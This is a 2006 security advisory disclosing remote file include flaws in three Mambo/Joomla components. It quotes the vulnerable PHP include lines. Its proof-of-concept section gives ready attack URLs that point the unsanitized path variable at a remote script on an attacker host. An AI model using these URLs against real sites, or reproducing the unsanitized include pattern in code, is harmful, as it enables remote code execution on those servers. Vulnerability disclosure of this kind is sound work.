ECHO_ADV_38$2006
----------------------------------------------------------------------------------------------- [ECHO_ADV_38$2006] Multiple Mambo/Joomla Component Remote File Include Vulnerabilities ----------------------------------------------------------------------------------------------- Author : Ahmad Maulana a.k.a Matdhule Date : July 12th 2006 Location : Indonesia, Jakarta Web : http://advisories.echo.or.id/adv/adv38-matdhule-2006.txt Critical Lvl : Highly critical Impact : System access Where : From Remote ------------------------------------------------------------------------ Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Hashcash Component Application : com_hashcash Component version : 1.2.1 URL : http://developer.joomla.org/sf/frs/do/viewRelease/projects.com_hashcash/frs.components.com_hashcash # HTMLArea3 addon - ImageManager Application : HTMLArea3 addon - ImageManager Version : 1.5 URL : # Sitemap 2.0.0 for Mambo 4.5.1 CMS Application : Sitemap 2.0.0 for Mambo 4.5.1 CMS Version : Sitemap 2.0.0 URL : http://mamboxchange.com/frs/download.php/6463/sitemap20.zip ------------------------------------------------------------------------ Vulnerability: ~~~~~~~~~~~~~~ # Hashcash Component In folder com_hashcash we found vulnerability script server.php. -----------------------server.php--------------------------------------- <?php include($mosConfig_absolute_path."/administrator/components/com_hashcash/config.hashcash.php"); require_once ($mosConfig_absolute_path.'/components/com_hashcash/CryptoStrategy.php'); ................... ------------------------------------------------------------------------ # HTMLArea3 addon - ImageManager In folder ImageManager we found vulnerability script config.inc.php. -----------------------config.inc.php----------------------------------- <?php // $Id: config.inc.php, v 1.5 2004/06/03 17:35:27 bpfeifer Exp $ /** * HTMLArea3 addon - ImageManager * Based on Wei Zhuo's ImageManager * @package Mambo Open Source * @Copyright 2004 Bernhard Pfeifer aka novocaine * @ All rights reserved * @ Released under GNU/GPL License : http://www.gnu.org/copyleft/gpl.html * @version $Revision: 1.5 $ **/ require($mosConfig_absolute_path."/administrator/components/com_htmlarea3_xtd-c/config.htmlarea3_xtd-c.php"); ------------------------------------------------------------------------ # Sitemap 2.0.0 for Mambo 4.5.1 CMS In folder com_sitemap we found vulnerability script sitemap.xml.php. -----------------------sitemap.xml.php---------------------- <?php /** * XML/XHTML menu system * @package Mambo_4.5.1 * @copyright (C) 2000 - 2004 Miro International Pty Ltd * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL * Mambo is Free Software * Author : Johan Janssens - [EMAIL PROTECTED] (http://www.jinx.be) **/ // XML library require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' ); ------------------------------------------------------------ Variables $mosConfig_absolute_path are not properly sanitized. When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script. Proof Of Concept: ~~~~~~~~~~~~~~~ http://[target]/[path]/components/com_hashcash/server.php?mosConfig_absolute_path=http://attacker.com/evil.txt? http://[target]/[path]/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://evilscript http://[target]/[path]/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://attacker.com/evil.txt? Solution: ~~~~~~~ sanitize variabel $mosConfig_absolute_path. ------------------------------------------------------------------------ --- Shoutz: ~~~~~ ~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :) ~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous ~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama ~ [EMAIL PROTECTED], [EMAIL PROTECTED] ~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net ------------------------------------------------------------------------ --- Contact: ~~~~~~ matdhule[at]gmail[dot]com -------------------------------- [ EOF ]----------------------------------
